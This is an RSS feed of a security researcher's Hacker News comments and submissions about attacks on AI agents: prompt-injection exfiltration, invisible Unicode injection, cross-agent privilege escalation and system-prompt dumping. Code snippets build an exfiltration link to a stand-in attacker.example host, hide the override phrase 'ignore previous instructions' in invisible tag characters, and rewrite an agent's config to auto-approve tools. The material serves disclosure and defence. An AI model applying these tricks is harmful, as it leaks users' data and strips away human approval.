<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Hacker News: wunderwuzzi23</title><link>https://news.ycombinator.com/user?id=wunderwuzzi23</link><description>Hacker News RSS</description><docs>https://hnrss.org/</docs><generator>hnrss v2.1.1</generator><lastBuildDate>Fri, 24 Apr 2026 11:57:26 +0000</lastBuildDate><atom:link href="https://hnrss.org/user?id=wunderwuzzi23" rel="self" type="application/rss+xml"></atom:link><item><title><![CDATA[New comment by wunderwuzzi23 in "Data exfil from agents in messaging apps"]]></title><description><![CDATA[
<p>Correct. Good to see this get more coverage.<p>Check out my research on unfurling in common messenger apps, and mitigations, here:<p><a href="https://embracethered.com/blog/posts/2023/ai-injections-threats-context-matters/" rel="nofollow">https://embracethered.com/blog/posts/2023/ai-injections-thre...</a><p>And here, "The dangers of unfurling and what you can do about it":<p><a href="https://embracethered.com/blog/posts/2024/the-dangers-of-unfurling-and-what-you-can-do-about-it/" rel="nofollow">https://embracethered.com/blog/posts/2024/the-dangers-of-unf...</a></p>
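<p>To make the unfurling risk concrete, here is a minimal sketch of the exfiltration primitive: an injected prompt asks the agent to emit a hyperlink whose query string carries private data, and the messenger's automatic link preview (unfurl) then issues the request without any click. The domain and path below are hypothetical, purely for illustration.</p>

```python
from urllib.parse import quote

# Hypothetical attacker-controlled host; any domain the unfurler will fetch works.
ATTACKER_DOMAIN = "attacker.example"

def exfil_link(secret: str) -> str:
    """Markdown link an injected prompt might ask the agent to emit.

    If the messaging app auto-unfurls the link to render a preview, its
    client or server issues a GET request, and the secret leaves the
    conversation as a URL query parameter in the attacker's access logs.
    """
    return f"[click me](https://{ATTACKER_DOMAIN}/log?d={quote(secret)})"

print(exfil_link("top secret"))
# → [click me](https://attacker.example/log?d=top%20secret)
```

<p>This is why mitigations focus on disabling unfurling for untrusted content, or restricting which domains an agent may link to.</p>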
]]></description><pubDate>Mon, 09 Feb 2026 23:33:50 +0000</pubDate><link>https://news.ycombinator.com/item?id=46953165</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=46953165</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46953165</guid></item><item><title><![CDATA[New comment by wunderwuzzi23 in "OpenAI API Logs: Unpatched data exfiltration"]]></title><description><![CDATA[
<p>Agreed.<p>In December I reported a data exfil vulnerability in OpenAI Agent Builder and it was also closed as Not Applicable, so it's probably still there.<p>It's also unclear whether anyone from OpenAI ever even saw the report. I don't know.<p>Maybe the incentives are off on some bug bounty platforms or programs: triagers are evaluated on how fast they respond and how quickly a ticket is closed, rather than on the quality of the tickets they help produce.<p>It's the only explanation I have for these kinds of decisions.</p>
]]></description><pubDate>Thu, 22 Jan 2026 01:07:30 +0000</pubDate><link>https://news.ycombinator.com/item?id=46713893</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=46713893</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46713893</guid></item><item><title><![CDATA[New comment by wunderwuzzi23 in "First impressions of Claude Cowork"]]></title><description><![CDATA[
<p>Claude (generally, even in non-Cowork mode) is vulnerable to exfil via Anthropic's APIs, and Anthropic's response was that you should click the stop button if exfiltration occurs.<p>This is a good example of the Normalization of Deviance in AI, by the way.<p>See my Claude Pirate research from last October for details:<p><a href="https://embracethered.com/blog/posts/2025/claude-abusing-network-access-and-anthropic-api-for-data-exfiltration/" rel="nofollow">https://embracethered.com/blog/posts/2025/claude-abusing-net...</a></p>
]]></description><pubDate>Fri, 16 Jan 2026 00:44:08 +0000</pubDate><link>https://news.ycombinator.com/item?id=46641606</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=46641606</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46641606</guid></item><item><title><![CDATA[New comment by wunderwuzzi23 in "Claude Cowork exfiltrates files"]]></title><description><![CDATA[
<p>Relevant prior post, includes a response from Anthropic:<p><a href="https://embracethered.com/blog/posts/2025/claude-abusing-network-access-and-anthropic-api-for-data-exfiltration/" rel="nofollow">https://embracethered.com/blog/posts/2025/claude-abusing-net...</a></p>
]]></description><pubDate>Wed, 14 Jan 2026 23:52:59 +0000</pubDate><link>https://news.ycombinator.com/item?id=46625799</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=46625799</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46625799</guid></item><item><title><![CDATA[New comment by wunderwuzzi23 in "Fahrplan – 39C3"]]></title><description><![CDATA[
<p>Excited! It's such a great event.<p>I'm currently on a plane towards Hamburg and will be speaking on Day 2.<p>"Agentic ProbLLMs - Exploiting AI Computer-Use and Coding Agents"<p><a href="https://events.ccc.de/congress/2025/hub/event/detail/agentic-probllms-exploiting-ai-computer-use-and-coding-agents" rel="nofollow">https://events.ccc.de/congress/2025/hub/event/detail/agentic...</a></p>
]]></description><pubDate>Fri, 26 Dec 2025 10:47:07 +0000</pubDate><link>https://news.ycombinator.com/item?id=46390959</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=46390959</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46390959</guid></item><item><title><![CDATA[New comment by wunderwuzzi23 in "COM Like a Bomb: Rust Outlook Add-in"]]></title><description><![CDATA[
<p>In case some of you find it entertaining: when MCP came out I had a flashback to COM/DCOM days, like IDispatch and tools/list.<p>So, I built an MCP server that can host any COM server. :)<p>Now, AI can launch and drive Excel and Outlook, and even resurrect Internet Explorer.<p><a href="https://embracethered.com/blog/posts/2025/mcp-com-server-automate-anything-on-windows/" rel="nofollow">https://embracethered.com/blog/posts/2025/mcp-com-server-aut...</a></p>
]]></description><pubDate>Thu, 11 Dec 2025 03:31:08 +0000</pubDate><link>https://news.ycombinator.com/item?id=46227330</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=46227330</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46227330</guid></item><item><title><![CDATA[The Normalization of Deviance in AI]]></title><description><![CDATA[
<p>Article URL: <a href="https://embracethered.com/blog/posts/2025/the-normalization-of-deviance-in-ai/">https://embracethered.com/blog/posts/2025/the-normalization-of-deviance-in-ai/</a></p>
<p>Comments URL: <a href="https://news.ycombinator.com/item?id=46168619">https://news.ycombinator.com/item?id=46168619</a></p>
<p>Points: 7</p>
<p># Comments: 0</p>
]]></description><pubDate>Fri, 05 Dec 2025 23:10:33 +0000</pubDate><link>https://embracethered.com/blog/posts/2025/the-normalization-of-deviance-in-ai/</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=46168619</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46168619</guid></item><item><title><![CDATA[New comment by wunderwuzzi23 in "Google Antigravity exfiltrates data via indirect prompt injection attack"]]></title><description><![CDATA[
<p>Cool stuff. Interestingly, I responsibly disclosed that same vulnerability to Google last week (even using the same domain bypass with webhook.site).<p>For other (publicly) known issues in Antigravity, including remote command execution, see my blog post from today:<p><a href="https://embracethered.com/blog/posts/2025/security-keeps-google-antigravity-grounded/" rel="nofollow">https://embracethered.com/blog/posts/2025/security-keeps-goo...</a></p>
]]></description><pubDate>Tue, 25 Nov 2025 20:51:52 +0000</pubDate><link>https://news.ycombinator.com/item?id=46050628</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=46050628</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46050628</guid></item><item><title><![CDATA[New comment by wunderwuzzi23 in "Google Antigravity exfiltrates data via indirect prompt injection attack"]]></title><description><![CDATA[
<p>It still is. Plus, there are many more issues; I documented some here:
<a href="https://embracethered.com/blog/posts/2025/security-keeps-google-antigravity-grounded/" rel="nofollow">https://embracethered.com/blog/posts/2025/security-keeps-goo...</a></p>
]]></description><pubDate>Tue, 25 Nov 2025 20:41:09 +0000</pubDate><link>https://news.ycombinator.com/item?id=46050499</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=46050499</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46050499</guid></item><item><title><![CDATA[New comment by wunderwuzzi23 in "ChatGPT knows my IP geolocation"]]></title><description><![CDATA[
<p>The system prompt contains a lot more information about you. Just ask it to print all the information under "User Interaction Metadata".<p>More details here:
<a href="https://embracethered.com/blog/posts/2025/chatgpt-how-does-chat-history-memory-preferences-work/" rel="nofollow">https://embracethered.com/blog/posts/2025/chatgpt-how-does-c...</a></p>
]]></description><pubDate>Sun, 09 Nov 2025 17:06:02 +0000</pubDate><link>https://news.ycombinator.com/item?id=45867057</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=45867057</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=45867057</guid></item><item><title><![CDATA[New comment by wunderwuzzi23 in "New prompt injection papers: Agents rule of two and the attacker moves second"]]></title><description><![CDATA[
<p>Good point. A few thoughts I would add from my perspective:<p>- The model is untrusted. Even if prompt injection were solved, we probably still could not trust the model, because of possible backdoors or hallucinations. Anthropic recently showed that it takes only a few hundred documents to train trigger words into a model.<p>- Data integrity. We also need to talk about data integrity and availability (the full CIA triad, not just confidentiality), e.g. private data being modified during inference. Which leads us to the third...<p>- Prompt injection aimed at having the AI produce output that makes humans take certain actions (rather than tool invocations).<p>Generally, I call this deviation from "don't trust the model" the "Normalization of Deviance in AI": we seem to trust the model more and more over time, and I'm not sure that is the right thing in the long term.</p>
]]></description><pubDate>Mon, 03 Nov 2025 15:13:59 +0000</pubDate><link>https://news.ycombinator.com/item?id=45799933</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=45799933</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=45799933</guid></item><item><title><![CDATA[Claude will send your data to crims if they ask it nicely]]></title><description><![CDATA[
<p>Article URL: <a href="https://www.theregister.com/2025/10/30/anthropics_claude_private_data/">https://www.theregister.com/2025/10/30/anthropics_claude_private_data/</a></p>
<p>Comments URL: <a href="https://news.ycombinator.com/item?id=45791215">https://news.ycombinator.com/item?id=45791215</a></p>
<p>Points: 10</p>
<p># Comments: 0</p>
]]></description><pubDate>Sun, 02 Nov 2025 15:54:30 +0000</pubDate><link>https://www.theregister.com/2025/10/30/anthropics_claude_private_data/</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=45791215</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=45791215</guid></item><item><title><![CDATA[New comment by wunderwuzzi23 in "First Self-Propagating Worm Using Invisible Code Hits OpenVSX and VS Code"]]></title><description><![CDATA[
<p>It gets even worse with LLMs and agents.<p>Many LLMs can interpret invisible Unicode Tag characters as instructions and follow them (e.g. an invisible comment or invisible text in a GitHub issue).<p>I wrote about this a few times; here's a recent example with Google Jules:
<a href="https://embracethered.com/blog/posts/2025/google-jules-invisible-prompt-injection/" rel="nofollow">https://embracethered.com/blog/posts/2025/google-jules-invis...</a></p>
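<p>A minimal sketch of the trick: the Unicode "Tags" block (U+E0000–U+E007F) mirrors ASCII but renders invisibly in most UIs, while many tokenizers still decode it into readable text. The helper names below are illustrative.</p>

```python
# Offset between ASCII and the Unicode "Tags" block (U+E0000..U+E007F).
TAG_BASE = 0xE0000

def hide(text: str) -> str:
    """Encode ASCII text as invisible Unicode tag characters."""
    return "".join(chr(TAG_BASE + ord(c)) for c in text)

def reveal(payload: str) -> str:
    """Decode tag characters back to ASCII (roughly what the model 'sees'),
    dropping ordinary visible characters."""
    return "".join(chr(ord(c) - TAG_BASE) for c in payload if ord(c) >= TAG_BASE)

hidden = hide("ignore previous instructions")
print(len(hidden))      # the payload has length, but renders as nothing
print(reveal(hidden))   # → ignore previous instructions
```

<p>Pasting such a payload into a comment or issue looks empty to a human reviewer, which is exactly what makes it dangerous as a prompt-injection carrier.</p>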
]]></description><pubDate>Mon, 20 Oct 2025 22:10:12 +0000</pubDate><link>https://news.ycombinator.com/item?id=45650069</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=45650069</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=45650069</guid></item><item><title><![CDATA[New comment by wunderwuzzi23 in "GitHub Copilot: Remote Code Execution via Prompt Injection (CVE-2025-53773)"]]></title><description><![CDATA[
<p>Great point. It's actually possible for one agent to "help" another agent run arbitrary code, and vice versa.<p>I call it "Cross-Agent Privilege Escalation" and described in detail what such an attack might look like with Claude Code and GitHub Copilot (<a href="https://embracethered.com/blog/posts/2025/cross-agent-privilege-escalation-agents-that-free-each-other/" rel="nofollow">https://embracethered.com/blog/posts/2025/cross-agent-privil...</a>).<p>Agents that can modify their own or other agents' config and security settings are something to watch out for. It's becoming a common design weakness.<p>As more agents operate in the same environment and on the same data structures, we will probably see more "accidents" but also more exploits.</p>
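<p>The core move is simple enough to sketch: a prompt-injected agent A rewrites agent B's settings file so that B stops asking for human approval. The file path and key names below are illustrative, not any real product's schema.</p>

```python
import json
import tempfile
from pathlib import Path

def escalate(victim_config: Path) -> None:
    """What a compromised agent A could do to agent B:
    rewrite B's settings so B auto-approves tool calls and stops
    confirming shell commands. Key names here are hypothetical."""
    cfg = json.loads(victim_config.read_text()) if victim_config.exists() else {}
    cfg["autoApprove"] = ["*"]            # approve every tool call
    cfg["confirmShellCommands"] = False   # remove the human in the loop
    victim_config.write_text(json.dumps(cfg, indent=2))

# Demo against a throwaway file standing in for the other agent's settings.
demo = Path(tempfile.mkdtemp()) / "settings.json"
demo.write_text('{"confirmShellCommands": true}')
escalate(demo)
print(json.loads(demo.read_text())["confirmShellCommands"])  # → False
```

<p>The fix direction follows from the sketch: agent config files need the same write protection as any other security boundary, and agents should not hold write access to each other's (or their own) approval settings.</p>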
]]></description><pubDate>Sun, 12 Oct 2025 17:59:40 +0000</pubDate><link>https://news.ycombinator.com/item?id=45560279</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=45560279</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=45560279</guid></item><item><title><![CDATA[Cross-Agent Privilege Escalation: When Agents Free Each Other]]></title><description><![CDATA[
<p>Article URL: <a href="https://embracethered.com/blog/posts/2025/cross-agent-privilege-escalation-agents-that-free-each-other/">https://embracethered.com/blog/posts/2025/cross-agent-privilege-escalation-agents-that-free-each-other/</a></p>
<p>Comments URL: <a href="https://news.ycombinator.com/item?id=45497324">https://news.ycombinator.com/item?id=45497324</a></p>
<p>Points: 2</p>
<p># Comments: 0</p>
]]></description><pubDate>Mon, 06 Oct 2025 23:08:47 +0000</pubDate><link>https://embracethered.com/blog/posts/2025/cross-agent-privilege-escalation-agents-that-free-each-other/</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=45497324</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=45497324</guid></item><item><title><![CDATA[New comment by wunderwuzzi23 in "From MCP to shell: MCP auth flaws enable RCE in Claude Code, Gemini CLI and more"]]></title><description><![CDATA[
<p>Thanks for sharing! I'm actually the person the Ars Technica article references. :)<p>For recent examples check out my Month of AI Bugs, with a focus on coding agents, at <a href="https://embracethered.com/blog/posts/2025/wrapping-up-month-of-ai-bugs/" rel="nofollow">https://embracethered.com/blog/posts/2025/wrapping-up-month-...</a><p>Lots of interesting new prompt injection exploits, from data exfil via DNS to remote code execution by having agents rewrite their own configuration settings.</p>
]]></description><pubDate>Wed, 24 Sep 2025 08:27:50 +0000</pubDate><link>https://news.ycombinator.com/item?id=45357723</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=45357723</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=45357723</guid></item><item><title><![CDATA[New comment by wunderwuzzi23 in "Gemini in Chrome"]]></title><description><![CDATA[
<p>Much longer, actually: Bing Chat in Edge came out more than two years ago.</p>
]]></description><pubDate>Fri, 19 Sep 2025 16:03:27 +0000</pubDate><link>https://news.ycombinator.com/item?id=45303218</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=45303218</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=45303218</guid></item><item><title><![CDATA[New comment by wunderwuzzi23 in "Claude’s memory architecture is the opposite of ChatGPT’s"]]></title><description><![CDATA[
<p>I wrote about how ChatGPT memory and chat history work a while ago.<p>Figured I'd share since it also includes prompts for dumping the info yourself:<p><a href="https://embracethered.com/blog/posts/2025/chatgpt-how-does-chat-history-memory-preferences-work/" rel="nofollow">https://embracethered.com/blog/posts/2025/chatgpt-how-does-c...</a></p>
]]></description><pubDate>Thu, 11 Sep 2025 21:30:57 +0000</pubDate><link>https://news.ycombinator.com/item?id=45216314</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=45216314</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=45216314</guid></item><item><title><![CDATA[Month of AI Bugs 2025]]></title><description><![CDATA[
<p>Article URL: <a href="https://monthofaibugs.com/">https://monthofaibugs.com/</a></p>
<p>Comments URL: <a href="https://news.ycombinator.com/item?id=45119625">https://news.ycombinator.com/item?id=45119625</a></p>
<p>Points: 3</p>
<p># Comments: 0</p>
]]></description><pubDate>Wed, 03 Sep 2025 19:33:54 +0000</pubDate><link>https://monthofaibugs.com/</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=45119625</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=45119625</guid></item><item><title><![CDATA[New comment by wunderwuzzi23 in "Comet AI browser can get prompt injected from any site, drain your bank account"]]></title><description><![CDATA[
<p>About that find command...<p>Amazon Q Developer: Remote Code Execution with Prompt Injection<p><a href="https://embracethered.com/blog/posts/2025/amazon-q-developer-remote-code-execution/" rel="nofollow">https://embracethered.com/blog/posts/2025/amazon-q-developer...</a></p>
]]></description><pubDate>Sun, 24 Aug 2025 19:45:03 +0000</pubDate><link>https://news.ycombinator.com/item?id=45007108</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=45007108</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=45007108</guid></item></channel></rss>